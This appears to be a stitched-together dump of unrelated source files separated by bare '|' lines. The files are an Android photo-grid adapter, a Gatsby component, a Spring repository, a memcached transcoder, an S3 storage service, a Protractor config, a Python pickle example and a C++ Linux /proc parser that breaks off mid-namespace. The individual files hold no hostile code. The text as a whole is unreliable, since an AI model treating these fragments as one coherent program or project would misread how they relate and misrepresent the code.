          if (singleFileStatus.numJobs <= 0) {
            whenDone();
          }
        };
        if (texts.length === 0) {
          whenDone(); // count this file as finished even though it had no texts
        }
        for (const text of texts) {
          preprocessText(text, jsonFilesDir, xmlFileName, isoDict, singleTextCallback);
        }
      });
    });
  }
}
// Public API: only directory-level preprocessing is exposed.
module.exports = { preprocess_dir };
|
package com.walkermanx.photopicker.adapter;
import android.content.Context;
import android.graphics.drawable.Drawable;
import android.os.Build;
import android.util.DisplayMetrics;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.widget.ImageView;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.view.ViewCompat;
import androidx.fragment.app.Fragment;
import androidx.recyclerview.widget.RecyclerView;
import com.bumptech.glide.Glide;
import com.bumptech.glide.Priority;
import com.bumptech.glide.RequestManager;
import com.bumptech.glide.load.DataSource;
import com.bumptech.glide.load.engine.GlideException;
import com.bumptech.glide.request.RequestListener;
import com.bumptech.glide.request.RequestOptions;
import com.bumptech.glide.request.target.Target;
import com.walkermanx.photopicker.PhotoPickerActivity;
import com.walkermanx.photopicker.R;
import com.walkermanx.photopicker.entity.Photo;
import com.walkermanx.photopicker.entity.PhotoDirectory;
import com.walkermanx.photopicker.event.OnItemCheckListener;
import com.walkermanx.photopicker.event.OnPhotoClickListener;
import com.walkermanx.photopicker.utils.AndroidLifecycleUtils;
import com.walkermanx.photopicker.utils.MediaStoreHelper;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.atomic.AtomicBoolean;
/**
* Created by donglua on 15/5/31.
*/
public class PhotoGridAdapter extends SelectableAdapter<PhotoGridAdapter.PhotoViewHolder> {
    private LayoutInflater inflater;
    /** Glide request manager scoped to the hosting fragment's lifecycle. */
    public final RequestManager requestManager;
    private RequestOptions options; // shared Glide options (crop, cell size, placeholders)
    private OnItemCheckListener onItemCheckListener = null;
    private OnPhotoClickListener onPhotoClickListener = null;
    private View.OnClickListener onCameraClickListener = null;
    /** View type for the leading "open camera" cell. */
    public final static int ITEM_TYPE_CAMERA = 100;
    /** View type for an ordinary photo cell. */
    public final static int ITEM_TYPE_PHOTO = 101;
    private final static int COL_NUMBER_DEFAULT = 3;
    private boolean hasCamera = true;        // show the camera cell at position 0
    private boolean previewEnable = true;    // tapping a photo opens the preview
    private boolean hideSelectFrame = false; // hide the selection overlay on cells
    private int imageSize;                   // cell edge in px (screen width / columns)
    private int columnNumber = COL_NUMBER_DEFAULT;
    private Fragment fragment;
    /**
     * @param context          used for inflating item views and measuring the screen
     * @param fragment         hosting fragment; scopes Glide and shared-element transitions
     * @param photoDirectories backing data set of photo directories
     */
    public PhotoGridAdapter(Context context, Fragment fragment, List<PhotoDirectory> photoDirectories) {
        this.fragment = fragment;
        this.photoDirectories = photoDirectories;
        this.requestManager = Glide.with(fragment);
        inflater = LayoutInflater.from(context);
        setColumnNumber(context, columnNumber);
        // One shared options object for every cell: center-cropped thumbnails
        // sized to the grid cell, with placeholder/error drawables.
        this.options = new RequestOptions()
                .centerCrop()
                .dontAnimate()
                .override(imageSize, imageSize)
                .placeholder(R.drawable.__picker_ic_photo_black_48dp)
                .error(R.drawable.__picker_ic_broken_image_black_48dp)
                .priority(Priority.HIGH);
    }
    /**
     * Full constructor.
     *
     * @param orginalPhotos   paths pre-selected before the picker opened; seeds the selection
     * @param colNum          number of grid columns (overrides the default of 3)
     * @param hideSelectFrame true to hide the selection overlay on photo cells
     */
    public PhotoGridAdapter(Context context, Fragment fragment, List<PhotoDirectory> photoDirectories, ArrayList<String> orginalPhotos, int colNum, boolean hideSelectFrame) {
        this(context, fragment, photoDirectories);
        setColumnNumber(context, colNum);
        selectedPhotos = new ArrayList<>();
        if (orginalPhotos != null) {
            selectedPhotos.addAll(orginalPhotos);
        }
        this.hideSelectFrame = hideSelectFrame;
    }
    /**
     * Record the column count and derive the square cell size (screen width
     * divided by columns) used to size Glide thumbnails.
     * NOTE(review): getDefaultDisplay()/getMetrics() are deprecated on newer
     * API levels — consider WindowMetrics when the min SDK allows.
     */
    private void setColumnNumber(Context context, int columnNumber) {
        this.columnNumber = columnNumber;
        WindowManager wm = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE);
        DisplayMetrics metrics = new DisplayMetrics();
        wm.getDefaultDisplay().getMetrics(metrics);
        int widthPixels = metrics.widthPixels;
        imageSize = widthPixels / columnNumber;
    }
    /** Position 0 is the camera cell when the camera is shown; all others are photos. */
    @Override
    public int getItemViewType(int position) {
        return (showCamera() && position == 0) ? ITEM_TYPE_CAMERA : ITEM_TYPE_PHOTO;
    }
    /**
     * Inflate a photo cell. Camera cells reuse the same layout but hide the
     * selection view, center the icon, and wire the camera click listener here
     * (binding-time work is skipped for them in onBindViewHolder).
     */
    @NonNull
    @Override
    public PhotoViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
        final View itemView = inflater.inflate(R.layout.__picker_item_photo, parent, false);
        final PhotoViewHolder holder = new PhotoViewHolder(itemView);
        if (viewType == ITEM_TYPE_CAMERA) {
            holder.vSelected.setVisibility(View.GONE);
            holder.ivPhoto.setScaleType(ImageView.ScaleType.CENTER);
            holder.ivPhoto.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View view) {
                    if (onCameraClickListener != null) {
                        onCameraClickListener.onClick(view);
                    }
                }
            });
        } else {
            holder.vSelected.setVisibility(hideSelectFrame ? View.GONE : View.VISIBLE);
        }
        return holder;
    }
    /**
     * Resume the postponed shared-element enter transition once the image for
     * the "selected" position has loaded. Guarded so only the matching holder
     * triggers it, and only once (enterTransitionStarted latch).
     */
    private void onPhotoLoadCompleted(PhotoViewHolder holder) {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
            // Call startPostponedEnterTransition only when the 'selected' image loading is completed.
            if (PhotoPickerActivity.currentPosition != holder.getAdapterPosition()) {
                return;
            }
            if (holder.enterTransitionStarted.getAndSet(true)) {
                return;
            }
            fragment.startPostponedEnterTransition();
        }
    }
    /**
     * Bind a cell. Photo cells: load the thumbnail via Glide (notifying the
     * shared-element transition on completion), reflect and toggle selection
     * state, and route photo taps to preview, external check handling, or the
     * selection toggle depending on configuration. Camera cells: just show the
     * camera icon (the click listener was wired in onCreateViewHolder).
     */
    @Override
    public void onBindViewHolder(@NonNull final PhotoViewHolder holder, int position) {
        if (getItemViewType(position) == ITEM_TYPE_PHOTO) {
            List<Photo> photos = getCurrentPhotos();
            final Photo photo;
            // the camera cell occupies position 0, shifting photo indices by one
            if (showCamera()) {
                photo = photos.get(position - 1);
            } else {
                photo = photos.get(position);
            }
            // Set the string value of the image resource as the unique transition name for the view.
            ViewCompat.setTransitionName(holder.ivPhoto, photo.getPath());
            // skip loading when the surrounding activity/fragment is being torn down
            boolean canLoadImage = AndroidLifecycleUtils.canLoadImage(holder.ivPhoto.getContext());
            if (canLoadImage) {
                requestManager.load(new File(photo.getPath()))
//                        .centerCrop()
//                        .dontAnimate()
                        .thumbnail(0.5f)
//                        .override(imageSize, imageSize)
//                        .placeholder(R.drawable.__picker_ic_photo_black_48dp)
//                        .error(R.drawable.__picker_ic_broken_image_black_48dp)
                        .apply(options)
                        .listener(new RequestListener<Drawable>() {
                            // both success and failure must release the postponed
                            // enter transition, or the screen would stay frozen
                            @Override
                            public boolean onLoadFailed(@Nullable GlideException e, Object model,
                                                        Target<Drawable> target, boolean isFirstResource) {
                                onPhotoLoadCompleted(holder);
                                return false;
                            }
                            @Override
                            public boolean onResourceReady(Drawable resource, Object model, Target<Drawable>
                                    target, DataSource dataSource, boolean isFirstResource) {
                                onPhotoLoadCompleted(holder);
                                return false;
                            }
                        })
                        .into(holder.ivPhoto);
            }
            if (!hideSelectFrame) {
                final boolean isChecked = isSelected(photo);
                holder.vSelected.setSelected(isChecked);
                holder.ivPhoto.setSelected(isChecked);
                holder.vSelected.setOnClickListener(new View.OnClickListener() {
                    @Override
                    public void onClick(View view) {
                        int pos = holder.getAdapterPosition();
                        boolean isEnable = true;
                        // let the listener veto the toggle (e.g. max-count reached);
                        // the third argument is the selection count after the toggle
                        if (onItemCheckListener != null) {
                            isEnable = onItemCheckListener.onItemCheck(pos, photo,
                                    getSelectedPhotos().size() + (isSelected(photo) ? -1 : 1));
                        }
                        if (isEnable) {
                            toggleSelection(photo);
                            notifyItemChanged(pos);
                        }
                    }
                });
            }
            holder.ivPhoto.setOnClickListener(new View.OnClickListener() {
                @Override
                public void onClick(View view) {
                    if (onPhotoClickListener != null) {
                        int pos = holder.getAdapterPosition();
                        if (previewEnable) {
                            onPhotoClickListener.onClick(view, pos, showCamera());
                        } else {
                            // no preview: a tap either reports the check directly
                            // (frame hidden) or delegates to the selection view
                            if (hideSelectFrame) {
                                if (onItemCheckListener != null) {
                                    onItemCheckListener.onItemCheck(pos, photo, 0);
                                }
                            } else {
                                holder.vSelected.performClick();
                            }
                        }
                    }
                }
            });
        } else {
            holder.ivPhoto.setImageResource(R.drawable.__picker_camera);
        }
    }
@Override
public int getItemCount() {
    // Guard against asking for the current directory's photos before any
    // directory data has been loaded. (Idiom: isEmpty() over size() == 0.)
    int photosCount = photoDirectories.isEmpty() ? 0 : getCurrentPhotos().size();
    // The camera tile occupies one extra position when shown.
    return showCamera() ? photosCount + 1 : photosCount;
}
/**
 * Holder for one grid cell: the photo (or camera icon) and the selection
 * checkmark. {@code enterTransitionStarted} makes the postponed shared-element
 * transition fire at most once per holder.
 */
public static class PhotoViewHolder extends RecyclerView.ViewHolder {
    private ImageView ivPhoto;
    private View vSelected;
    private AtomicBoolean enterTransitionStarted;
    public PhotoViewHolder(View itemView) {
        super(itemView);
        ivPhoto = itemView.findViewById(R.id.iv_photo);
        vSelected = itemView.findViewById(R.id.v_selected);
        enterTransitionStarted = new AtomicBoolean();
    }
}
/** Registers the listener consulted before a photo's selection is toggled. */
public void setOnItemCheckListener(OnItemCheckListener onItemCheckListener) {
    this.onItemCheckListener = onItemCheckListener;
}
/** Registers the listener invoked when a photo tile is tapped. */
public void setOnPhotoClickListener(OnPhotoClickListener onPhotoClickListener) {
    this.onPhotoClickListener = onPhotoClickListener;
}
/** Registers the listener invoked when the camera tile is tapped. */
public void setOnCameraClickListener(View.OnClickListener onCameraClickListener) {
    this.onCameraClickListener = onCameraClickListener;
}
/**
 * Returns a snapshot of the currently selected photo paths. The returned list
 * is a defensive copy, so callers cannot mutate the adapter's selection state.
 */
public ArrayList<String> getSelectedPhotoPaths() {
    return new ArrayList<>(selectedPhotos);
}
/** Enables or disables the leading camera tile. */
public void setShowCamera(boolean hasCamera) {
    this.hasCamera = hasCamera;
}
/** Enables or disables the full-screen preview on photo tap. */
public void setPreviewEnable(boolean previewEnable) {
    this.previewEnable = previewEnable;
}
/** The camera tile is shown only in the synthetic "all photos" directory. */
public boolean showCamera() {
    return (hasCamera && currentDirectoryIndex == MediaStoreHelper.INDEX_ALL_PHOTOS);
}
@Override
public void onViewRecycled(@NonNull PhotoViewHolder holder) {
    // Cancel any in-flight Glide request so a recycled cell never receives a
    // stale image.
    requestManager.clear(holder.ivPhoto);
    super.onViewRecycled(holder);
}
}
|
<filename>src/components/Services.js
import React from "react"
import { graphql, useStaticQuery } from "gatsby"
import ServiceCard from "./ServiceCard"
// Static GraphQL query: all Contentful "ServiceBruni" entries with their
// title, alt text, long-text description and fluid image data for
// gatsby-image rendering.
const query = graphql`
{
services: allContentfulServiceBruni {
nodes {
id
title
altText
desc: childContentfulServiceBruniDescriptionTextNode {
description
}
image {
fluid {
...GatsbyContentfulFluid
}
}
}
}
}
`
const Services = () => {
const {
services: { nodes },
} = useStaticQuery(query)
return (
<section id="services" className="u-section services">
<div className="u-section-center">
<h2 className="heading-tertiary u-center-text">services</h2>
<div className="services__container">
{nodes.map(service => {
return <ServiceCard key={service.id} service={service} />
})}
</div>
</div>
</section>
)
}
export default Services
|
<reponame>TommasoAzz/Stalker-Backend
package it.qbteam.persistence.repository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.data.repository.CrudRepository;
import org.springframework.data.repository.query.Param;
import org.springframework.stereotype.Repository;
import it.qbteam.model.PlaceAccess;
/**
 * CRUD repository for {@link PlaceAccess} records, with HQL lookups by
 * organization auth-server, exit token, and place.
 */
@Repository
public interface PlaceAccessRepository extends CrudRepository<PlaceAccess, Long> {
    /** Accesses to a place filtered by the organization's auth-server id. */
    @Query("from PlaceAccess where orgAuthServerId=:serverId and placeId=:plId")
    Iterable<PlaceAccess> findByOrgAuthServerIdAndPlaceId(@Param("serverId") String orgAuthServerId, @Param("plId") Long placeId);
    /** Accesses to a place filtered by the exit token issued on entry. */
    @Query("from PlaceAccess where exitToken=:token and placeId=:plId")
    Iterable<PlaceAccess> findByExitTokenAndPlaceId(@Param("token") String exitToken, @Param("plId") Long placeId);
    /** All accesses recorded for the given place. */
    @Query("from PlaceAccess where placeId=:plId")
    Iterable<PlaceAccess> findByPlaceId(@Param("plId") Long placeId);
}
|
package com.dam.user.rest.message;
import com.fasterxml.jackson.databind.JsonNode;
/**
 * WrappedRequest wraps an arbitrary JSON payload so heterogeneous request
 * bodies can be passed through a single endpoint.
 *
 * Scope: External Calls
 *
 * @author dirk
 *
 */
public class WrappedRequest {
private JsonNode wrappedMsg;
// private String password;
public WrappedRequest(JsonNode wrappedMsg, String dummy) {
// super("CS 0.0.1");
// this.ipAddress = ipAddress;
this.wrappedMsg=wrappedMsg;
// this.password = password;
}
public JsonNode getWrappedMsg() {
return wrappedMsg;
}
public void setWrappedMsg(JsonNode wrappedMsg) {
this.wrappedMsg = wrappedMsg;
}
// public String getPassword() {
// return password;
// }
//
// public void setPassword(String password) {
// this.password = password;
// }
} |
// Doxygen-generated search index for the "key" and "knl_msr_json" symbols.
// Auto-generated output -- do not edit by hand.
var searchData=
[
  ['key',['key',['../classgeopm_1_1_profile_table.html#a3ccebf2606e66bded2f5566539d46afc',1,'geopm::ProfileTable::key()'],['../classgeopm_1_1_profile_table_imp.html#a7ebd0ea914e167a287538f365c592eec',1,'geopm::ProfileTableImp::key()'],['../classgeopm_1_1_shared_memory.html#a5b16cccaccbc0cabcf1865839f512205',1,'geopm::SharedMemory::key()'],['../classgeopm_1_1_shared_memory_imp.html#ace424fee3cc2e21f0314e483e41769f1',1,'geopm::SharedMemoryImp::key()']]],
  ['knl_5fmsr_5fjson',['knl_msr_json',['../namespacegeopm.html#af919d6005584b60c7d51f9649f0f6117',1,'geopm']]]
];
|
<reponame>hhaip/langtaosha
package cn.lts.memcachedclient.serializer;
import cn.lts.common.exception.InternalRuntimeException;
import net.rubyeye.xmemcached.transcoders.CachedData;
import net.rubyeye.xmemcached.transcoders.CompressionMode;
import net.rubyeye.xmemcached.transcoders.Transcoder;
/**
* 默认的编解码器
*
* @author zhangli
*/
/**
 * Default transcoder (encoder/decoder) for values stored in memcached.
 * Serializes with the project's pluggable {@code Serializer} and performs no
 * compression or primitive packing.
 *
 * @author zhangli
 */
public class DefaultTranscoder implements Transcoder<Object> {
    // Maximum size of a cached value in bytes.
    private int maxSize;
    /**
     * Serialization type. Defaults to Hessian; this property is intended to
     * switch serialization formats, but only the default is supported for now.
     * Later versions may allow switching by injecting this property.
     *
     * @see SerializerTypeConstant
     */
    private int serializerType = SerializerTypeConstant.HESSIAN_DEFAULT_CLASSLOADER;
    public DefaultTranscoder() {
        this(CachedData.MAX_SIZE);
    }
    public DefaultTranscoder(int max) {
        this.maxSize = max;
    }
    @Override
    public CachedData encode(Object object) {
        Serializer serializer = SerializerFactory.findSerializer();
        byte[] b = null;
        try {
            b = serializer.serialize(object);
        } catch (Exception e) {
            // Internal runtime exceptions are deliberately swallowed (best-effort
            // cache write); anything else is rethrown.
            if (!(e instanceof InternalRuntimeException)) {
                throw new RuntimeException(e);
            }
        }
        // The serializer type is stored in the flag so readers can pick the
        // matching deserializer. NOTE: b may be null if serialization failed.
        return new CachedData(serializerType, b, this.maxSize, -1);
    }
    @Override
    public Object decode(CachedData cachedData) {
        // The flag read here is not necessarily this application's own
        // serialization format: another application may have written the same
        // key with a different serializer, so the deserializer must be chosen
        // from the flag. Kryo serialization is no longer supported.
        int flag = cachedData.getFlag();
        if(flag != SerializerTypeConstant.HESSIAN_DEFAULT_CLASSLOADER) {
            return null;
        }
        Serializer serializer = SerializerFactory.findSerializer();
        Object object = null;
        try {
            object = serializer.deserialize(cachedData.getData());
        } catch (Exception e) {
            if (!(e instanceof InternalRuntimeException)) {
                throw new RuntimeException(e);
            }
        }
        return object;
    }
    @Override
    public void setPrimitiveAsString(boolean primitiveAsString) {
        // Intentionally unsupported; see isPrimitiveAsString().
    }
    @Override
    public void setPackZeros(boolean packZeros) {
        // Intentionally unsupported; see isPackZeros().
    }
    @Override
    public boolean isPrimitiveAsString() {
        // If primitives were not flagged as String, xmemcached would add/strip
        // a 4-byte type marker on set/get; we keep this disabled.
        return false;
    }
    @Override
    public boolean isPackZeros() {
        // Not used by this transcoder.
        return false;
    }
    @Override
    public void setCompressionThreshold(int to) {
        // No compression: values are stored as "plain" serialized bytes.
    }
    @Override
    public void setCompressionMode(CompressionMode compressMode) {
        // No compression: values are stored as "plain" serialized bytes.
    }
    public void setSerializerType(int serializerType) {
        this.serializerType = serializerType;
    }
}
|
package com.devaneios.turmadeelite.services.impl;
import com.amazonaws.auth.AWSStaticCredentialsProvider;
import com.amazonaws.auth.BasicAWSCredentials;
import com.amazonaws.regions.Regions;
import com.amazonaws.services.s3.AmazonS3;
import com.amazonaws.services.s3.AmazonS3ClientBuilder;
import com.amazonaws.services.s3.model.ObjectMetadata;
import com.amazonaws.services.s3.model.S3Object;
import com.devaneios.turmadeelite.entities.Attachment;
import com.devaneios.turmadeelite.services.DataStorageService;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Service;
import org.springframework.web.multipart.MultipartFile;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.math.BigInteger;
import java.security.DigestInputStream;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.UUID;
/**
 * Production {@link DataStorageService} backed by Amazon S3.
 * Active in every Spring profile except "test".
 */
@Service
@Profile("!test")
public class S3DataStorageProduction implements DataStorageService {

    private final AmazonS3 s3;

    @Value("${aws.s3.bucketName}")
    String bucketName;

    public S3DataStorageProduction(
            @Value("${aws.s3.region}") String region,
            @Value("${aws.s3.accessKeyId}") String accessKeyId,
            @Value("${aws.s3.accessKey}") String accessKey
    ){
        BasicAWSCredentials credentials = new BasicAWSCredentials(accessKeyId, accessKey);
        this.s3 = AmazonS3ClientBuilder
                .standard()
                .withCredentials(new AWSStaticCredentialsProvider(credentials))
                .withRegion(Regions.fromName(region))
                .build();
    }

    /**
     * Uploads the stream's contents to S3 under {@code key}. The stream is
     * always closed, even when the upload fails.
     */
    @Override
    public void uploadFile(String key, Object fileInputStream) throws IOException {
        FileInputStream inputStream = (FileInputStream) fileInputStream;
        try {
            // S3 requires the content length up front for streamed puts.
            long size = inputStream.getChannel().size();
            ObjectMetadata metaData = new ObjectMetadata();
            metaData.setContentLength(size);
            this.s3.putObject(bucketName, key, inputStream, metaData);
        } finally {
            inputStream.close();
        }
    }

    /** Returns the raw content stream of the object stored under {@code key}. */
    @Override
    public InputStream downloadFile(String key) throws IOException {
        S3Object s3Object = this.s3.getObject(bucketName, key);
        return s3Object.getObjectContent();
    }

    /** Builds a collision-resistant bucket key: {@code path + randomUUID + fileName}. */
    @Override
    public String getKey(String path, String fileName) {
        String uuid = UUID.randomUUID().toString();
        return path + uuid + fileName;
    }

    @Override
    public void deleteObject(String key) {
        this.s3.deleteObject(bucketName, key);
    }

    /** Creates an {@link Attachment} (key + MD5 + name) for an uploaded teacher post. */
    @Override
    public Attachment from(MultipartFile multipartFile, String path) throws IOException, NoSuchAlgorithmException {
        String key = this.getKey("activities/teachers-posts/", multipartFile.getOriginalFilename());
        String md5 = this.getMd5(multipartFile.getInputStream());
        return Attachment
                .builder()
                .bucketKey(key)
                .fileMd5(md5)
                .filename(multipartFile.getOriginalFilename())
                .build();
    }

    /**
     * Computes the uppercase, zero-padded MD5 hex digest of the stream.
     *
     * FIX: the previous version called {@code digest()} without ever reading
     * the stream through the {@link DigestInputStream}, so it always returned
     * the MD5 of empty input. The stream must be fully consumed first.
     */
    private String getMd5(InputStream inputStream) throws NoSuchAlgorithmException, IOException {
        MessageDigest messageDigest = MessageDigest.getInstance("MD5");
        byte[] buffer = new byte[8192];
        try (DigestInputStream digestInputStream = new DigestInputStream(inputStream, messageDigest)) {
            // Reading through the digest stream feeds the MessageDigest.
            while (digestInputStream.read(buffer) != -1) {
                // discard; only the digest matters
            }
        }
        byte[] bytes = messageDigest.digest();
        BigInteger bi = new BigInteger(1, bytes);
        return String.format("%0" + (bytes.length << 1) + "X", bi);
    }
}
|
// Protractor configuration for running the suite against Mobile Safari in the
// iOS Simulator through an Appium server.
exports.config = {
  // Appium (not a plain Selenium server) listens on this endpoint.
  seleniumAddress: 'http://localhost:4723/wd/hub',
  specs: ['../test/protractor/spec.js'],
  chromeOnly: false,
  capabilities: {
    browserName: 'safari'
    , platformName: 'iOS'
    , deviceName: 'iPhone Simulator'
  },
  // App under test; HTTP_PORT overrides the default port 8000.
  baseUrl: 'http://localhost:' + (process.env.HTTP_PORT || '8000')
};
import pickle
def serialize_object(obj, file_path):
    """Serialize ``obj`` with :mod:`pickle` and write it to ``file_path``.

    Best-effort helper: any failure is reported on stdout instead of raised.
    """
    try:
        out = open(file_path, 'wb')
        try:
            pickle.dump(obj, out)
        finally:
            out.close()
        print(f"Object serialized and saved to {file_path}")
    except Exception as e:
        print(f"Serialization failed: {e}")
# Example usage: pickle a small dict next to the script.
data = {'name': 'Alice', 'age': 30, 'city': 'Wonderland'}
file_path = 'serialized_data.pkl'
serialize_object(data, file_path)
<filename>src/components/title.js
import { createElement } from "../lib/dom";
import "./title.scss";
import logo from "../assets/pokeball.svg";
// Builds the page header: the Pokéball logo image followed by an <h1>
// containing the given text. Returns both elements as an array.
export function title(text) {
  const image = createElement("img", { className: "logo", src: logo });
  const heading = createElement("h1", { className: "title", innerText: text });
  return [image, heading];
}
|
<reponame>toooot0000/System-Monitor
#include "linux_parser.h"
#include <dirent.h>
#include <unistd.h>
#include <sstream>
#include <string>
#include <vector>
#include <unordered_map>
#include <regex>
#include <filesystem>
#include <assert.h>
#include <iostream>
using std::stof;
using std::string;
using std::to_string;
using std::vector;
// DONE: An example of how to read data from the filesystem
string LinuxParser::OperatingSystem() {
  // Parse /etc/os-release key=value lines and return PRETTY_NAME.
  string line;
  string key;
  string value;
  std::ifstream filestream(kOSPath);
  if (filestream.is_open()) {
    while (std::getline(filestream, line)) {
      // Protect embedded spaces, then turn '=' and quotes into separators so
      // the stream extraction below yields key/value pairs.
      std::replace(line.begin(), line.end(), ' ', '_');
      std::replace(line.begin(), line.end(), '=', ' ');
      std::replace(line.begin(), line.end(), '"', ' ');
      std::istringstream linestream(line);
      while (linestream >> key >> value) {
        if (key == "PRETTY_NAME") {
          // Restore the spaces that were protected above.
          std::replace(value.begin(), value.end(), '_', ' ');
          return value;
        }
      }
    }
  }
  return value;
}
// DONE: An example of how to read data from the filesystem
string LinuxParser::Kernel() {
  // /proc/version starts "Linux version <kernel> ..."; the third token is the
  // kernel release string.
  string os, kernel, version;
  string line;
  std::ifstream stream(kProcDirectory + kVersionFilename);
  if (stream.is_open()) {
    std::getline(stream, line);
    std::istringstream linestream(line);
    linestream >> os >> version >> kernel;
  }
  return kernel;
}
// Get a list of Pids
// Returns the pids of all running processes: every all-digit directory name
// directly under /proc.
vector<int> LinuxParser::Pids() {
  vector<int> pids;
  for (const auto& i : std::filesystem::directory_iterator(kProcDirectory))
  {
    if (!i.is_directory()) continue;
    auto filename = string(std::filesystem::path(i.path()).filename());
    if (std::all_of(filename.begin(), filename.end(), isdigit))
      pids.push_back(stoi(filename));
  }
  return pids;
}
namespace LinuxParser
{
// Memory utility: cached values (kB) parsed from /proc/meminfo.
std::unordered_map<std::string, long> memoVars
{
    {"MemTotal", 0},
    {"MemFree", 0},
    {"Buffers", 0},
    {"Cached", 0},
    // FIX: the key was misspelled "SReclamable"; /proc/meminfo reports
    // "SReclaimable", so the old entry could never be populated.
    {"SReclaimable", 0},
    {"Shmem", 0},
    {"SwapTotal", 0},
    {"SwapFree", 0}
};
}
// DONE: Read and return the system memory utilization
float LinuxParser::MemoryUtilization()
{
  // Parse /proc/meminfo ("Key:   value kB") into memoVars, then compute
  // utilization as (MemTotal - MemFree) / MemTotal.
  std::ifstream stream(kProcDirectory + kMeminfoFilename);
  if (!stream.is_open()) throw "Memoinfo not opened!";
  string line;
  string key;
  long value;
  while (std::getline(stream, line))
  {
    std::replace(line.begin(), line.end(), ':', ' ');
    std::istringstream linestream(line);
    while (linestream >> key >> value)
    {
      // Only keys pre-registered in memoVars are recorded.
      if (memoVars.find(key) == memoVars.end()) continue;
      memoVars[key] = value;
    }
  }
  long totalMemory = memoVars["MemTotal"];
  // FIX: guard against a missing/zero MemTotal, which previously divided by
  // zero and returned NaN/inf.
  if (totalMemory == 0) return 0.0f;
  return static_cast<float>(totalMemory - memoVars["MemFree"]) / totalMemory;
}
namespace LinuxParser
{
// Uptime sampling state: previous reading and the delta between the last two
// readings (both in seconds), updated by UpTime().
long preUptime{0};
long uptimeDiff{0};
}
// DONE: Read and return the system uptime
// Reads the system uptime (seconds) from /proc/uptime and updates the
// uptimeDiff sampling state as a side effect.
long LinuxParser::UpTime()
{
  std::ifstream stream(kProcDirectory + kUptimeFilename);
  if (!stream.is_open()) throw "Uptime not opened";
  string line;
  std::getline(stream, line);
  std::istringstream linesteam(line);
  // /proc/uptime holds "<uptime> <idle>" in seconds.
  long upTime, idleTime;
  linesteam >> upTime >> idleTime;
  uptimeDiff = upTime - preUptime;
  preUptime = upTime;
  return upTime;
}
// Seconds elapsed between the last two UpTime() samples.
long LinuxParser::UpTimeDiff() {return uptimeDiff;}
// Declare these variables here to avoid multiple declarations
namespace LinuxParser
{
// CPU utility: the last raw jiffy counters from /proc/stat plus the previous
// idle/total sums and the total delta, updated by CpuUtilization().
long CPUJiffies[CPUStates::SIZE]{ 0 };
long cpuPreIdle{ 0 };
long cpuPreTotal{ 0 };
long cpuJiffiesDiff{0};
}
// DONE: Read and return the number of jiffies for the system
// Total jiffies for the system: the sum over every CPU time-accounting state
// most recently read from /proc/stat.
inline long LinuxParser::Jiffies()
{
  long total = 0;
  for (long state : CPUJiffies) total += state;
  return total;
}
// Active (non-idle) jiffies for the system.
inline long LinuxParser::ActiveJiffies()
{
  return Jiffies() - IdleJiffies();
}
// Idle jiffies: idle time plus time waiting on I/O.
inline long LinuxParser::IdleJiffies()
{
  return CPUJiffies[CPUStates::kIdle_] + CPUJiffies[CPUStates::kIOwait_];
}
// Total-jiffy delta between the last two CpuUtilization() samples.
long LinuxParser::JiffiesDifference()
{
  return cpuJiffiesDiff;
}
// DONE: Read and return CPU utilization
// Aggregate CPU utilization over the interval since the previous call,
// computed from the deltas of the "cpu" line of /proc/stat. Also refreshes
// CPUJiffies and the cpuPre*/cpuJiffiesDiff sampling state.
float LinuxParser::CpuUtilization()
{
  std::ifstream instream(kProcDirectory + kStatFilename);
  if (!instream.is_open()) throw "Stat not opened!";
  string line;
  getline(instream, line);
  std::istringstream sstream(line);
  string cpu;
  sstream >> cpu;  // skip the leading "cpu" label
  for (auto i = 0; i != CPUStates::SIZE; ++i)
    sstream >> CPUJiffies[i];
  long total = Jiffies();
  long idle = IdleJiffies();
  long totald = total - cpuPreTotal;
  long idled = idle - cpuPreIdle;
  // Busy fraction of the interval; 0.0 when no jiffies elapsed (first call
  // or identical samples), avoiding a divide by zero.
  float res = totald ? static_cast<float>(totald - idled) / totald : 0.0;
  cpuJiffiesDiff = totald;
  cpuPreIdle = idle;
  cpuPreTotal = total;
  return res;
}
// DONE: Read and return the total number of processes
// Total number of processes created since boot: the "processes" line of
// /proc/stat. Returns 0 if the line is absent.
int LinuxParser::TotalProcesses()
{
  std::ifstream instream(kProcDirectory + kStatFilename);
  if (!instream.is_open()) throw "Stat not opened!";
  string line;
  while (getline(instream, line))
  {
    std::istringstream sstream(line);
    string key;
    sstream >> key;
    if (key == "processes")
    {
      int value;
      sstream >> value;
      return value;
    }
  }
  return 0;
}
// DONE: Read and return the number of running processes
// Number of currently runnable processes: the "procs_running" line of
// /proc/stat. Returns 0 if the line is absent.
int LinuxParser::RunningProcesses()
{
  std::ifstream instream(kProcDirectory + kStatFilename);
  if (!instream.is_open()) throw "Stat not opened!";
  string line;
  while (getline(instream, line))
  {
    std::istringstream sstream(line);
    string key;
    sstream >> key;
    if (key == "procs_running")
    {
      int value;
      sstream >> value;
      return value;
    }
  }
  return 0;
}
namespace LinuxParser
{
// Cache of uid -> username, lazily populated from /etc/passwd by Users().
std::unordered_map<int, string> users = {};
}
// Returns the uid -> username map, parsing /etc/passwd ("name:x:uid:...") on
// first use and serving the cached result afterwards.
std::unordered_map<int, string>& LinuxParser::Users()
{
  if (!users.empty()) return users;
  std::ifstream infilestream(kPasswordPath);
  if (!infilestream.is_open()) throw "/etc/passwd not opened!";
  string line;
  while (getline(infilestream, line))
  {
    std::replace(line.begin(), line.end(), ':', ' ');
    std::stringstream sstream(line);
    string name, x;
    int uid;
    sstream >> name >> x >> uid;
    users[uid] = name;
  }
  return users;
}
namespace LinuxParser
{
// Zero-based field indices into /proc/[pid]/stat.
// utime is the 14th field, stime the 15th (1-based).
const int _PROCESS_STAT_UTIME = 13;
// const int _PROCESS_STAT_STIME = 14;
// const int _PROCESS_STAT_CUTIME = 15;
// const int _PROCESS_STAT_CSTIME = 16;
